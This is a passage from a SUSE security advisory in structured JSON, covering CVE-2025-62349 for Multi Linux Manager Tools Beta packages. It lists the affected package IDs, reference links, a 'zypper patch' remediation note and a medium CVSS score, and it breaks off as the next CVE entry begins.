"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62349",
"url": "https://www.suse.com/security/cve/CVE-2025-62349"
},
{
"category": "external",
"summary": "SUSE Bug 1254257 for CVE-2025-62349",
"url": "https://bugzilla.suse.com/1254257"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "moderate"
}
],
"title": "CVE-2025-62349"
},
{
"cve": "CVE-2025-67724",
"ids": [
{
"system_name": "SUSE CVE Page",
